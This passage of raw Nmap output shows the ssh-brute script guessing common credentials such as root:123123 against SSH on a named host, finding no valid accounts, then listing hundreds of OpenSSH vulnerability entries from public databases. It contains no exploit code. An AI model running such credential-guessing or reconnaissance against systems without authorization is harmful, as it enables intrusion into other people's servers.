9128NSE: [ssh-brute] Trying username/password pair: root:123123
9129NSE: [ssh-brute] Trying username/password pair: admin:123123
9130NSE: [ssh-brute] Trying username/password pair: administrator:123123
9131NSE: [ssh-brute] Trying username/password pair: webadmin:123123
9132NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
9133NSE: [ssh-brute] Trying username/password pair: netadmin:123123
9134NSE: [ssh-brute] Trying username/password pair: guest:123123
9135NSE: [ssh-brute] Trying username/password pair: user:123123
9136NSE: [ssh-brute] Trying username/password pair: web:123123
9137NSE: [ssh-brute] Trying username/password pair: test:123123
9138NSE: [ssh-brute] Trying username/password pair: root:justin
9139NSE: [ssh-brute] Trying username/password pair: admin:justin
9140NSE: [ssh-brute] Trying username/password pair: administrator:justin
9141NSE: [ssh-brute] Trying username/password pair: webadmin:justin
9142NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
9143NSE: [ssh-brute] Trying username/password pair: netadmin:justin
9144NSE: [ssh-brute] Trying username/password pair: guest:justin
9145NSE: [ssh-brute] Trying username/password pair: user:justin
9146NSE: [ssh-brute] Trying username/password pair: web:justin
9147NSE: [ssh-brute] Trying username/password pair: test:justin
9148NSE: [ssh-brute] Trying username/password pair: root:liverpool
9149NSE: [ssh-brute] Trying username/password pair: admin:liverpool
9150NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
9151NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
9152NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
9153NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
9154NSE: [ssh-brute] Trying username/password pair: guest:liverpool
9155NSE: [ssh-brute] Trying username/password pair: user:liverpool
9156NSE: [ssh-brute] Trying username/password pair: web:liverpool
9157NSE: [ssh-brute] Trying username/password pair: test:liverpool
9158NSE: [ssh-brute] Trying username/password pair: root:football
9159NSE: [ssh-brute] Trying username/password pair: admin:football
9160NSE: [ssh-brute] Trying username/password pair: administrator:football
9161NSE: [ssh-brute] Trying username/password pair: webadmin:football
9162NSE: [ssh-brute] Trying username/password pair: sysadmin:football
9163NSE: [ssh-brute] Trying username/password pair: netadmin:football
9164NSE: [ssh-brute] Trying username/password pair: guest:football
9165NSE: [ssh-brute] Trying username/password pair: user:football
9166NSE: [ssh-brute] Trying username/password pair: web:football
9167NSE: [ssh-brute] Trying username/password pair: test:football
9168NSE: [ssh-brute] Trying username/password pair: root:loveme
9169NSE: [ssh-brute] Trying username/password pair: admin:loveme
9170NSE: [ssh-brute] Trying username/password pair: administrator:loveme
9171NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
9172NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
9173NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
9174NSE: [ssh-brute] Trying username/password pair: guest:loveme
9175NSE: [ssh-brute] Trying username/password pair: user:loveme
9176NSE: [ssh-brute] Trying username/password pair: web:loveme
9177NSE: [ssh-brute] Trying username/password pair: test:loveme
9178NSE: [ssh-brute] Trying username/password pair: root:secret
9179NSE: [ssh-brute] Trying username/password pair: admin:secret
9180NSE: [ssh-brute] Trying username/password pair: administrator:secret
9181NSE: [ssh-brute] Trying username/password pair: webadmin:secret
9182NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
9183NSE: [ssh-brute] Trying username/password pair: netadmin:secret
9184NSE: [ssh-brute] Trying username/password pair: guest:secret
9185NSE: [ssh-brute] Trying username/password pair: user:secret
9186NSE: [ssh-brute] Trying username/password pair: web:secret
9187NSE: [ssh-brute] Trying username/password pair: test:secret
9188NSE: [ssh-brute] Trying username/password pair: root:andrea
9189NSE: [ssh-brute] Trying username/password pair: admin:andrea
9190NSE: [ssh-brute] Trying username/password pair: administrator:andrea
9191NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
9192NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
9193NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
9194NSE: [ssh-brute] Trying username/password pair: guest:andrea
9195NSE: [ssh-brute] Trying username/password pair: user:andrea
9196NSE: [ssh-brute] Trying username/password pair: web:andrea
9197NSE: [ssh-brute] Trying username/password pair: test:andrea
9198NSE: [ssh-brute] Trying username/password pair: root:jennifer
9199NSE: [ssh-brute] Trying username/password pair: admin:jennifer
9200NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
9201NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
9202NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
9203NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
9204NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
9205NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
9206Nmap scan report for www.ygmt.info (185.82.200.52)
9207Host is up (0.100s latency).
9208rDNS record for 185.82.200.52: latina.petite.guru
9209
9210PORT STATE SERVICE VERSION
921122/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
9212| ssh-auth-methods:
9213| Supported authentication methods:
9214| publickey
9215|_ password
9216| ssh-brute:
9217| Accounts: No valid accounts found
9218|_ Statistics: Performed 445 guesses in 181 seconds, average tps: 2.7
9219| ssh-hostkey:
9220| 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
9221| 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
9222| 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
9223|_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
9224|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
9225|_ssh-run: Failed to specify credentials and command to run.
9226| vulscan: VulDB - https://vuldb.com:
9227| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
9228| [76326] OpenSSH 6.8 XSECURITY privilege escalation
9229| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
9230| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
9231| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
9232| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
9233|
9234| MITRE CVE - https://cve.mitre.org:
9235| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
9236| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
9237| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
9238| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
9239| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
9240| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
9241|
9242| SecurityFocus - https://www.securityfocus.com/bid/:
9243| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
9244| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
9245| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
9246| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
9247| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
9248| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
9249| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
9250| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
9251| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
9252| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
9253| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
9254| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
9255| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
9256| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
9257| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
9258| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
9259| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
9260| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
9261| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
9262| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
9263| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
9264| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
9265| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
9266| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
9267| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
9268| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
9269| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
9270| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
9271| [75990] OpenSSH Login Handling Security Bypass Weakness
9272| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
9273| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
9274| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
9275| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
9276| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
9277| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
9278| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
9279| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
9280| [61286] OpenSSH Remote Denial of Service Vulnerability
9281| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
9282| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
9283| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
9284| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
9285| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
9286| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
9287| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
9288| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
9289| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
9290| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
9291| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
9292| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
9293| [30794] Red Hat OpenSSH Backdoor Vulnerability
9294| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
9295| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
9296| [28531] OpenSSH ForceCommand Command Execution Weakness
9297| [28444] OpenSSH X Connections Session Hijacking Vulnerability
9298| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
9299| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
9300| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
9301| [20956] OpenSSH Privilege Separation Key Signature Weakness
9302| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
9303| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
9304| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
9305| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
9306| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
9307| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
9308| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
9309| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
9310| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
9311| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
9312| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
9313| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
9314| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
9315| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
9316| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
9317| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
9318| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
9319| [6168] OpenSSH Visible Password Vulnerability
9320| [5374] OpenSSH Trojan Horse Vulnerability
9321| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
9322| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
9323| [4241] OpenSSH Channel Code Off-By-One Vulnerability
9324| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
9325| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
9326| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
9327| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
9328| [2917] OpenSSH PAM Session Evasion Vulnerability
9329| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
9330| [2356] OpenSSH Private Key Authentication Check Vulnerability
9331| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
9332| [1334] OpenSSH UseLogin Vulnerability
9333|
9334| IBM X-Force - https://exchange.xforce.ibmcloud.com:
9335| [83258] GSI-OpenSSH auth-pam.c security bypass
9336| [82781] OpenSSH time limit denial of service
9337| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
9338| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
9339| [72756] Debian openssh-server commands information disclosure
9340| [68339] OpenSSH pam_thread buffer overflow
9341| [67264] OpenSSH ssh-keysign unauthorized access
9342| [65910] OpenSSH remote_glob function denial of service
9343| [65163] OpenSSH certificate information disclosure
9344| [64387] OpenSSH J-PAKE security bypass
9345| [63337] Cisco Unified Videoconferencing OpenSSH weak security
9346| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
9347| [45202] OpenSSH signal handler denial of service
9348| [44747] RHEL OpenSSH backdoor
9349| [44280] OpenSSH PermitRootLogin information disclosure
9350| [44279] OpenSSH sshd weak security
9351| [44037] OpenSSH sshd SELinux role unauthorized access
9352| [43940] OpenSSH X11 forwarding information disclosure
9353| [41549] OpenSSH ForceCommand directive security bypass
9354| [41438] OpenSSH sshd session hijacking
9355| [40897] OpenSSH known_hosts weak security
9356| [40587] OpenSSH username weak security
9357| [37371] OpenSSH username data manipulation
9358| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
9359| [37112] RHSA update for OpenSSH signal handler race condition not installed
9360| [37107] RHSA update for OpenSSH identical block denial of service not installed
9361| [36637] OpenSSH X11 cookie privilege escalation
9362| [35167] OpenSSH packet.c newkeys[mode] denial of service
9363| [34490] OpenSSH OPIE information disclosure
9364| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
9365| [32975] Apple Mac OS X OpenSSH denial of service
9366| [32387] RHSA-2006:0738 updates for openssh not installed
9367| [32359] RHSA-2006:0697 updates for openssh not installed
9368| [32230] RHSA-2006:0298 updates for openssh not installed
9369| [32132] RHSA-2006:0044 updates for openssh not installed
9370| [30120] OpenSSH privilege separation monitor authentication verification weakness
9371| [29255] OpenSSH GSSAPI user enumeration
9372| [29254] OpenSSH signal handler race condition
9373| [29158] OpenSSH identical block denial of service
9374| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
9375| [25116] OpenSSH OpenPAM denial of service
9376| [24305] OpenSSH SCP shell expansion command execution
9377| [22665] RHSA-2005:106 updates for openssh not installed
9378| [22117] OpenSSH GSSAPI allows elevated privileges
9379| [22115] OpenSSH GatewayPorts security bypass
9380| [20930] OpenSSH sshd.c LoginGraceTime denial of service
9381| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
9382| [17213] OpenSSH allows port bouncing attacks
9383| [16323] OpenSSH scp file overwrite
9384| [13797] OpenSSH PAM information leak
9385| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
9386| [13264] OpenSSH PAM code could allow an attacker to gain access
9387| [13215] OpenSSH buffer management errors could allow an attacker to execute code
9388| [13214] OpenSSH memory vulnerabilities
9389| [13191] OpenSSH large packet buffer overflow
9390| [12196] OpenSSH could allow an attacker to bypass login restrictions
9391| [11970] OpenSSH could allow an attacker to obtain valid administrative account
9392| [11902] OpenSSH PAM support enabled information leak
9393| [9803] OpenSSH "
9394| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
9395| [9307] OpenSSH is running on the system
9396| [9169] OpenSSH "
9397| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
9398| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
9399| [8383] OpenSSH off-by-one error in channel code
9400| [7647] OpenSSH UseLogin option arbitrary code execution
9401| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
9402| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
9403| [7179] OpenSSH source IP access control bypass
9404| [6757] OpenSSH "
9405| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
9406| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
9407| [5517] OpenSSH allows unauthorized access to resources
9408| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
9409|
9410| Exploit-DB - https://www.exploit-db.com:
9411| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
9412|
9413| OpenVAS (Nessus) - http://www.openvas.org:
9414| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
9415| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
9416| [881183] CentOS Update for openssh CESA-2012:0884 centos6
9417| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
9418| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
9419| [870763] RedHat Update for openssh RHSA-2012:0884-04
9420| [870129] RedHat Update for openssh RHSA-2008:0855-01
9421| [861813] Fedora Update for openssh FEDORA-2010-5429
9422| [861319] Fedora Update for openssh FEDORA-2007-395
9423| [861170] Fedora Update for openssh FEDORA-2007-394
9424| [861012] Fedora Update for openssh FEDORA-2007-715
9425| [840345] Ubuntu Update for openssh vulnerability USN-597-1
9426| [840300] Ubuntu Update for openssh update USN-612-5
9427| [840271] Ubuntu Update for openssh vulnerability USN-612-2
9428| [840268] Ubuntu Update for openssh update USN-612-7
9429| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
9430| [840214] Ubuntu Update for openssh vulnerability USN-566-1
9431| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
9432| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
9433| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
9434| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
9435| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
9436| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
9437| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
9438| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
9439| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
9440| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
9441| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
9442| [100584] OpenSSH X Connections Session Hijacking Vulnerability
9443| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
9444| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
9445| [65987] SLES10: Security update for OpenSSH
9446| [65819] SLES10: Security update for OpenSSH
9447| [65514] SLES9: Security update for OpenSSH
9448| [65513] SLES9: Security update for OpenSSH
9449| [65334] SLES9: Security update for OpenSSH
9450| [65248] SLES9: Security update for OpenSSH
9451| [65218] SLES9: Security update for OpenSSH
9452| [65169] SLES9: Security update for openssh,openssh-askpass
9453| [65126] SLES9: Security update for OpenSSH
9454| [65019] SLES9: Security update for OpenSSH
9455| [65015] SLES9: Security update for OpenSSH
9456| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
9457| [61639] Debian Security Advisory DSA 1638-1 (openssh)
9458| [61030] Debian Security Advisory DSA 1576-2 (openssh)
9459| [61029] Debian Security Advisory DSA 1576-1 (openssh)
9460| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
9461| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
9462| [60667] Slackware Advisory SSA:2008-095-01 openssh
9463| [59014] Slackware Advisory SSA:2007-255-01 openssh
9464| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
9465| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
9466| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
9467| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
9468| [57492] Slackware Advisory SSA:2006-272-02 openssh
9469| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
9470| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
9471| [57470] FreeBSD Ports: openssh
9472| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
9473| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
9474| [56294] Slackware Advisory SSA:2006-045-06 openssh
9475| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
9476| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
9477| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
9478| [53788] Debian Security Advisory DSA 025-1 (openssh)
9479| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
9480| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
9481| [11343] OpenSSH Client Unauthorized Remote Forwarding
9482| [10954] OpenSSH AFS/Kerberos ticket/token passing
9483| [10883] OpenSSH Channel Code Off by 1
9484| [10823] OpenSSH UseLogin Environment Variables
9485|
9486| SecurityTracker - https://www.securitytracker.com:
9487| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
9488| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
9489| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
9490| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
9491| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
9492| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
9493| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
9494| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
9495| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
9496| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
9497| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
9498| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
9499| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
9500| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
9501| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
9502| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
9503| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
9504| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
9505| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
9506| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
9507| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
9508| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
9509| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
9510| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
9511| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
9512| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
9513| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
9514| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
9515| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
9516| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
9517| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
9518| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
9519| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
9520| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
9521| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
9522| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
9523| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
9524| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
9525|
9526| OSVDB - http://www.osvdb.org:
9527| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
9528| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
9529| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
9530| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
9531| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
9532| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
9533| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
9534| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
9535| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
9536| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
9537| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
9538| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
9539| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
9540| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
9541| [56921] OpenSSH Unspecified Remote Compromise
9542| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
9543| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
9544| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
9545| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
9546| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
9547| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
9548| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
9549| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
9550| [43745] OpenSSH X11 Forwarding Local Session Hijacking
9551| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
9552| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
9553| [37315] pam_usb OpenSSH Authentication Unspecified Issue
9554| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
9555| [34601] OPIE w/ OpenSSH Account Enumeration
9556| [34600] OpenSSH S/KEY Authentication Account Enumeration
9557| [32721] OpenSSH Username Password Complexity Account Enumeration
